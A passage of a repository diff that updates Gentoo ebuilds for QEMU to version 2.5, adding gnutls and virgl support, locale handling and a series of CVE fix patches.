usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] ) usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] ) uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] ) vde? ( net-misc/vde[static-libs(+)] )
virgl? ( media-libs/virglrenderer[static-libs(+)] )
virtfs? ( sys-libs/libcap ) virtfs? ( sys-libs/libcap )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )" xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}" USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
@ -150,7 +159,7 @@ CDEPEND="
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} ) qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
python? ( ${PYTHON_DEPS} ) python? ( ${PYTHON_DEPS} )
systemtap? ( dev-util/systemtap ) systemtap? ( dev-util/systemtap )
xen? ( app-emulation/xen-tools )" xen? ( app-emulation/xen-tools:= )"
DEPEND="${CDEPEND} DEPEND="${CDEPEND}
dev-lang/perl dev-lang/perl
=dev-lang/python-2* =dev-lang/python-2*
@ -288,6 +297,29 @@ check_targets() {
popd >/dev/null popd >/dev/null
} }
handle_locales() {
# Make sure locale list is kept up-to-date.
local detected sorted
detected=$(echo $(cd po && printf '%s\n' *.po | grep -v messages.po | sed 's:.po$::' | sort -u))
sorted=$(echo $(printf '%s\n' ${PLOCALES} | sort -u))
if [[ ${sorted} != "${detected}" ]] ; then
eerror "The ebuild needs to be kept in sync."
eerror "PLOCALES: ${sorted}"
eerror " po/*.po: ${detected}"
die "sync PLOCALES"
fi
# Deal with selective install of locales.
if use nls ; then
# Delete locales the user does not want. #577814
rm_loc() { rm po/$1.po || die; }
l10n_for_each_disabled_locale_do rm_loc
else
# Cheap hack to disable gettext .mo generation.
rm -f po/*.po
fi
}
src_prepare() { src_prepare() {
check_targets IUSE_SOFTMMU_TARGETS softmmu check_targets IUSE_SOFTMMU_TARGETS softmmu
check_targets IUSE_USER_TARGETS linux-user check_targets IUSE_USER_TARGETS linux-user
@ -297,17 +329,29 @@ src_prepare() {
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \ -e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation. epatch "${FILESDIR}"/qemu-2.5.0-cflags.patch
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${P}-block-mirror-crash.patch #558396
epatch "${FILESDIR}"/${P}-CVE-2015-5225.patch #558416
epatch "${FILESDIR}"/${PN}-2.4.0-e1000-loop.patch #559656
[[ -n ${BACKPORTS} ]] && \ [[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \ EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch epatch
epatch "${FILESDIR}"/${P}-CVE-2015-8567.patch #567868
epatch "${FILESDIR}"/${P}-CVE-2015-8558.patch #568246
epatch "${FILESDIR}"/${P}-CVE-2015-8701.patch #570110
epatch "${FILESDIR}"/${P}-CVE-2015-8743.patch #570988
epatch "${FILESDIR}"/${P}-CVE-2016-1568.patch #571566
epatch "${FILESDIR}"/${P}-CVE-2015-8613.patch #569118
epatch "${FILESDIR}"/${P}-CVE-2015-8619.patch #569300
epatch "${FILESDIR}"/${P}-CVE-2016-1714.patch #571560
epatch "${FILESDIR}"/${P}-CVE-2016-1922.patch #572082
epatch "${FILESDIR}"/${P}-CVE-2016-1981.patch #572412
epatch "${FILESDIR}"/${P}-usb-ehci-oob.patch #572454
epatch "${FILESDIR}"/${P}-CVE-2016-2197.patch #573280
epatch "${FILESDIR}"/${P}-CVE-2016-2198.patch #573314
epatch "${FILESDIR}"/${P}-CVE-2016-2392.patch #574902
epatch "${FILESDIR}"/${P}-usb-ndis-int-overflow.patch #575492
epatch "${FILESDIR}"/${P}-rng-stack-corrupt-{0,1,2,3}.patch #576420
epatch "${FILESDIR}"/${P}-sysmacros.patch
# Fix ld and objcopy being called directly # Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY tc-export AR LD OBJCOPY
@ -315,6 +359,9 @@ src_prepare() {
MAKEOPTS+=" V=1" MAKEOPTS+=" V=1"
epatch_user epatch_user
# Run after we've applied all patches.
handle_locales
} }
## ##
@ -339,6 +386,11 @@ qemu_src_configure() {
--disable-guest-agent --disable-guest-agent
--disable-strip --disable-strip
--disable-werror --disable-werror
# We support gnutls/nettle for crypto operations. It is possible
# to use gcrypt when gnutls/nettle are disabled (but not when they
# are enabled), but it's not really worth the hassle. Disable it
# all the time to avoid automatically detecting it. #568856
--disable-gcrypt
--python="${PYTHON}" --python="${PYTHON}"
--cc="$(tc-getCC)" --cc="$(tc-getCC)"
--cxx="$(tc-getCXX)" --cxx="$(tc-getCXX)"
@ -367,6 +419,8 @@ qemu_src_configure() {
$(conf_softmmu curl) $(conf_softmmu curl)
$(conf_softmmu fdt) $(conf_softmmu fdt)
$(conf_softmmu glusterfs) $(conf_softmmu glusterfs)
$(conf_softmmu gnutls)
$(conf_softmmu gnutls nettle)
$(conf_softmmu gtk) $(conf_softmmu gtk)
$(conf_softmmu infiniband rdma) $(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi) $(conf_softmmu iscsi libiscsi)
@ -382,16 +436,16 @@ qemu_src_configure() {
$(conf_softmmu sasl vnc-sasl) $(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl) $(conf_softmmu sdl)
$(conf_softmmu seccomp) $(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss) $(conf_softmmu smartcard)
$(conf_softmmu snappy) $(conf_softmmu snappy)
$(conf_softmmu spice) $(conf_softmmu spice)
$(conf_softmmu ssh libssh2) $(conf_softmmu ssh libssh2)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu usb libusb) $(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir) $(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid) $(conf_softmmu uuid)
$(conf_softmmu vde) $(conf_softmmu vde)
$(conf_softmmu vhost-net) $(conf_softmmu vhost-net)
$(conf_softmmu virgl virglrenderer)
$(conf_softmmu virtfs) $(conf_softmmu virtfs)
$(conf_softmmu vnc) $(conf_softmmu vnc)
$(conf_softmmu vte) $(conf_softmmu vte)
@ -565,12 +619,12 @@ src_install() {
doins "${FILESDIR}/bridge.conf" doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt # Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/" mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/" || die
cd "${S}" cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt dodoc docs/qmp-*.txt
if [[ -n ${softmmu_targets} ]]; then if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one # Remove SeaBIOS since we're using the SeaBIOS packaged one
@ -624,10 +678,6 @@ pkg_postinst() {
fi fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
} }
pkg_info() { pkg_info() {

113
sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-2.4.0.1.ebuild → sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-2.5.0-r3.ebuild vendored
View File

@ -1,4 +1,4 @@
# Copyright 1999-2015 Gentoo Foundation # Copyright 1999-2016 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
# $Id$ # $Id$
@ -7,8 +7,10 @@ EAPI=5
PYTHON_COMPAT=( python2_7 ) PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline" PYTHON_REQ_USE="ncurses,readline"
PLOCALES="de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils user udev fcaps readme.gentoo pax-utils l10n
BACKPORTS= BACKPORTS=
@ -20,7 +22,7 @@ else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2 SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+ ${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}" https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd" KEYWORDS="amd64 ~arm64 ~ppc ~ppc64 x86 ~x86-fbsd"
fi fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools" DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
@ -29,18 +31,18 @@ HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2" LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0" SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \ IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \ gnutls gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \ +png pulseaudio python \
rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \ static-user systemtap tci test +threads usb usbredir +uuid vde +vhost-net \
virtfs +vnc vte xattr xen xfs" virgl virtfs +vnc vte xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32 mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64" x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb" IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus" IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus tilegx"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS}) use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS}) use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
@ -65,6 +67,9 @@ REQUIRED_USE="${PYTHON_REQUIRED_USE}
# The attr lib isn't always linked in (although the USE flag is always # The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API # respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library. # when available rather than always using the extranl library.
#
# Older versions of gnutls are supported, but it's simpler to just require
# the latest versions. This is also why we require nettle.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)] COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)] sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )" xattr? ( sys-apps/attr[static-libs(+)] )"
@ -78,6 +83,10 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] ) curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] ) fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] ) glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
gnutls? (
dev-libs/nettle[static-libs(+)]
>=net-libs/gnutls-3.0[static-libs(+)]
)
gtk? ( gtk? (
gtk2? ( gtk2? (
x11-libs/gtk+:2 x11-libs/gtk+:2
@ -116,18 +125,18 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
) )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] ) seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
smartcard? ( dev-libs/nss !app-emulation/libcacard ) smartcard? ( >=app-emulation/libcacard-2.5.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] ) snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( spice? (
>=app-emulation/spice-protocol-0.12.3 >=app-emulation/spice-protocol-0.12.3
>=app-emulation/spice-0.12.0[static-libs(+)] >=app-emulation/spice-0.12.0[static-libs(+)]
) )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] ) ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r2[static-libs(+)] ) usb? ( >=virtual/libusb-1-r2[static-libs(+)] )
usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] ) usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] ) uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] ) vde? ( net-misc/vde[static-libs(+)] )
virgl? ( media-libs/virglrenderer[static-libs(+)] )
virtfs? ( sys-libs/libcap ) virtfs? ( sys-libs/libcap )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )" xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}" USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
@ -150,7 +159,7 @@ CDEPEND="
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} ) qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
python? ( ${PYTHON_DEPS} ) python? ( ${PYTHON_DEPS} )
systemtap? ( dev-util/systemtap ) systemtap? ( dev-util/systemtap )
xen? ( app-emulation/xen-tools )" xen? ( app-emulation/xen-tools:= )"
DEPEND="${CDEPEND} DEPEND="${CDEPEND}
dev-lang/perl dev-lang/perl
=dev-lang/python-2* =dev-lang/python-2*
@ -205,11 +214,14 @@ QA_WX_LOAD="usr/bin/qemu-i386
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n For AMD CPUs the module is called 'kvm-amd'.\n
For Intel CPUs the module is called 'kvm-intel'\n For Intel CPUs the module is called 'kvm-intel'.\n
Please review /etc/conf.d/modules for how to load these\n\n Please review /etc/conf.d/modules for how to load these.\n\n
Make sure your user is in the 'kvm' group\n Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login." Just run 'gpasswd -a <USER> kvm', then have <USER> re-login.\n\n
For brand new installs, the default permissions on /dev/kvm might not let you
access it. You can tell udev to reset ownership/perms:\n
udevadm trigger -c add /dev/kvm"
qemu_support_kvm() { qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \ if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
@ -288,6 +300,29 @@ check_targets() {
popd >/dev/null popd >/dev/null
} }
handle_locales() {
# Make sure locale list is kept up-to-date.
local detected sorted
detected=$(echo $(cd po && printf '%s\n' *.po | grep -v messages.po | sed 's:.po$::' | sort -u))
sorted=$(echo $(printf '%s\n' ${PLOCALES} | sort -u))
if [[ ${sorted} != "${detected}" ]] ; then
eerror "The ebuild needs to be kept in sync."
eerror "PLOCALES: ${sorted}"
eerror " po/*.po: ${detected}"
die "sync PLOCALES"
fi
# Deal with selective install of locales.
if use nls ; then
# Delete locales the user does not want. #577814
rm_loc() { rm po/$1.po || die; }
l10n_for_each_disabled_locale_do rm_loc
else
# Cheap hack to disable gettext .mo generation.
rm -f po/*.po
fi
}
src_prepare() { src_prepare() {
check_targets IUSE_SOFTMMU_TARGETS softmmu check_targets IUSE_SOFTMMU_TARGETS softmmu
check_targets IUSE_USER_TARGETS linux-user check_targets IUSE_USER_TARGETS linux-user
@ -297,17 +332,31 @@ src_prepare() {
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \ -e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation. epatch "${FILESDIR}"/qemu-2.5.0-cflags.patch
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${PN}-2.4.0-block-mirror-crash.patch #558396
epatch "${FILESDIR}"/${PN}-2.4.0-CVE-2015-7295-{1,2,3}.patch #560760
epatch "${FILESDIR}"/${PN}-2.4.0-CVE-2015-6855.patch #560422
[[ -n ${BACKPORTS} ]] && \ [[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \ EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch epatch
epatch "${FILESDIR}"/${P}-CVE-2015-8567.patch #567868
epatch "${FILESDIR}"/${P}-CVE-2015-8558.patch #568246
epatch "${FILESDIR}"/${P}-CVE-2015-8701.patch #570110
epatch "${FILESDIR}"/${P}-CVE-2015-8743.patch #570988
epatch "${FILESDIR}"/${P}-CVE-2016-1568.patch #571566
epatch "${FILESDIR}"/${P}-CVE-2015-8613.patch #569118
epatch "${FILESDIR}"/${P}-CVE-2015-8619.patch #569300
epatch "${FILESDIR}"/${P}-CVE-2016-1714.patch #571560
epatch "${FILESDIR}"/${P}-CVE-2016-1922.patch #572082
epatch "${FILESDIR}"/${P}-CVE-2016-1981.patch #572412
epatch "${FILESDIR}"/${P}-usb-ehci-oob.patch #572454
epatch "${FILESDIR}"/${P}-CVE-2016-2197.patch #573280
epatch "${FILESDIR}"/${P}-CVE-2016-2198.patch #573314
epatch "${FILESDIR}"/${P}-CVE-2016-2392.patch #574902
epatch "${FILESDIR}"/${P}-usb-ndis-int-overflow.patch #575492
epatch "${FILESDIR}"/${P}-rng-stack-corrupt-{0,1,2,3}.patch #576420
epatch "${FILESDIR}"/${P}-sysmacros.patch
epatch "${FILESDIR}"/${P}-ne2000-reg-check.patch #573816
epatch "${FILESDIR}"/${P}-9pfs-segfault.patch #578142
# Fix ld and objcopy being called directly # Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY tc-export AR LD OBJCOPY
@ -315,6 +364,9 @@ src_prepare() {
MAKEOPTS+=" V=1" MAKEOPTS+=" V=1"
epatch_user epatch_user
# Run after we've applied all patches.
handle_locales
} }
## ##
@ -339,6 +391,11 @@ qemu_src_configure() {
--disable-guest-agent --disable-guest-agent
--disable-strip --disable-strip
--disable-werror --disable-werror
# We support gnutls/nettle for crypto operations. It is possible
# to use gcrypt when gnutls/nettle are disabled (but not when they
# are enabled), but it's not really worth the hassle. Disable it
# all the time to avoid automatically detecting it. #568856
--disable-gcrypt
--python="${PYTHON}" --python="${PYTHON}"
--cc="$(tc-getCC)" --cc="$(tc-getCC)"
--cxx="$(tc-getCXX)" --cxx="$(tc-getCXX)"
@ -367,6 +424,8 @@ qemu_src_configure() {
$(conf_softmmu curl) $(conf_softmmu curl)
$(conf_softmmu fdt) $(conf_softmmu fdt)
$(conf_softmmu glusterfs) $(conf_softmmu glusterfs)
$(conf_softmmu gnutls)
$(conf_softmmu gnutls nettle)
$(conf_softmmu gtk) $(conf_softmmu gtk)
$(conf_softmmu infiniband rdma) $(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi) $(conf_softmmu iscsi libiscsi)
@ -382,16 +441,16 @@ qemu_src_configure() {
$(conf_softmmu sasl vnc-sasl) $(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl) $(conf_softmmu sdl)
$(conf_softmmu seccomp) $(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss) $(conf_softmmu smartcard)
$(conf_softmmu snappy) $(conf_softmmu snappy)
$(conf_softmmu spice) $(conf_softmmu spice)
$(conf_softmmu ssh libssh2) $(conf_softmmu ssh libssh2)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu usb libusb) $(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir) $(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid) $(conf_softmmu uuid)
$(conf_softmmu vde) $(conf_softmmu vde)
$(conf_softmmu vhost-net) $(conf_softmmu vhost-net)
$(conf_softmmu virgl virglrenderer)
$(conf_softmmu virtfs) $(conf_softmmu virtfs)
$(conf_softmmu vnc) $(conf_softmmu vnc)
$(conf_softmmu vte) $(conf_softmmu vte)
@ -565,12 +624,12 @@ src_install() {
doins "${FILESDIR}/bridge.conf" doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt # Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/" mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/" || die
cd "${S}" cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt dodoc docs/qmp-*.txt
if [[ -n ${softmmu_targets} ]]; then if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one # Remove SeaBIOS since we're using the SeaBIOS packaged one
@ -624,10 +683,6 @@ pkg_postinst() {
fi fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
} }
pkg_info() { pkg_info() {

103
sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-2.4.0.1-r1.ebuild → sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-2.5.1.ebuild vendored
View File

@ -1,4 +1,4 @@
# Copyright 1999-2015 Gentoo Foundation # Copyright 1999-2016 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
# $Id$ # $Id$
@ -7,8 +7,10 @@ EAPI=5
PYTHON_COMPAT=( python2_7 ) PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline" PYTHON_REQ_USE="ncurses,readline"
PLOCALES="de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils user udev fcaps readme.gentoo pax-utils l10n
BACKPORTS= BACKPORTS=
@ -20,7 +22,7 @@ else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2 SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+ ${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}" https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd" KEYWORDS="amd64 ~arm64 ~ppc ~ppc64 x86 ~x86-fbsd"
fi fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools" DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
@ -29,18 +31,18 @@ HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2" LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0" SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \ IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \ gnutls gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \ +png pulseaudio python \
rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \ static-user systemtap tci test +threads usb usbredir +uuid vde +vhost-net \
virtfs +vnc vte xattr xen xfs" virgl virtfs +vnc vte xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32 mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64" x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb" IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus" IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus tilegx"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS}) use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS}) use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
@ -65,6 +67,9 @@ REQUIRED_USE="${PYTHON_REQUIRED_USE}
# The attr lib isn't always linked in (although the USE flag is always # The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API # respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library. # when available rather than always using the extranl library.
#
# Older versions of gnutls are supported, but it's simpler to just require
# the latest versions. This is also why we require nettle.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)] COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)] sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )" xattr? ( sys-apps/attr[static-libs(+)] )"
@ -78,6 +83,10 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] ) curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] ) fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] ) glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
gnutls? (
dev-libs/nettle[static-libs(+)]
>=net-libs/gnutls-3.0[static-libs(+)]
)
gtk? ( gtk? (
gtk2? ( gtk2? (
x11-libs/gtk+:2 x11-libs/gtk+:2
@ -116,18 +125,18 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
) )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] ) seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
smartcard? ( dev-libs/nss !app-emulation/libcacard ) smartcard? ( >=app-emulation/libcacard-2.5.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] ) snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( spice? (
>=app-emulation/spice-protocol-0.12.3 >=app-emulation/spice-protocol-0.12.3
